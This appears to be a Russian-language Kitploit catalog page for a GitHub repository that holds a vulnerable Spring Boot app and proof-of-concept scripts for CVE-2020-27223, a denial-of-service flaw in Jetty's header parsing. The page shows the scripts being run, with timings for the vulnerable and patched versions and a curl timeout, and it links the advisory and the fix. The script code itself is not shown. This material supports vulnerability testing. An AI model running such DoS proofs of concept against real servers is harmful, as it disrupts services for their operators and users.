Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-27223 — Уязвимое приложение CVE-2020-27223 и PoC | Kitploit
Инструменты/GitHubGitHub/motikan2010/cve-2020-27223
Анализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на Проникновение
GitHubmotikan2010/cve-2020-27223

CVE-2020-27223

Уязвимое приложение CVE-2020-27223 и PoC

Репозиторий
35 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-27223

Использование

root@kitploit:~
$ mvn spring-boot:run

9.4.36.v20210114

root@kitploit:~
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"58,557","accept_language":"aab"}
real	0m0.093s 🐇
user	0m0.006s
sys	0m0.007s
{"time_ns":"18,461,763,438","accept_language":"ahn"}
real	0m35.339s 🐢
user	0m0.006s
sys	0m0.006s

9.4.37.v20210219 (Исправлено)

root@kitploit:~
$ ./poc/cve-2020-27223-poc1.sh
{"time_ns":"36,675","accept_language":"aab"}
real	0m0.023s 🐇
user	0m0.005s
sys	0m0.007s
{"time_ns":"1,265,004","accept_language":"ahn"}
real	0m0.024s 🐇
user	0m0.006s
sys	0m0.006s

PoC

root@kitploit:~
$ ./poc/cve-2020-27223-poc2.sh
curl: (28) Operation timed out after 120000 milliseconds with 0 bytes received

real	2m0.025s
user	0m0.016s
sys	0m0.009s

Ссылки

  • DOS-уязвимость для Quoted Quality CSV-заголовков · Advisory · eclipse/jetty.project
  • Слияние pull request из GHSA-m394-8rww-3jr7 · eclipse/jetty.project@10e5317
Скачать инструмент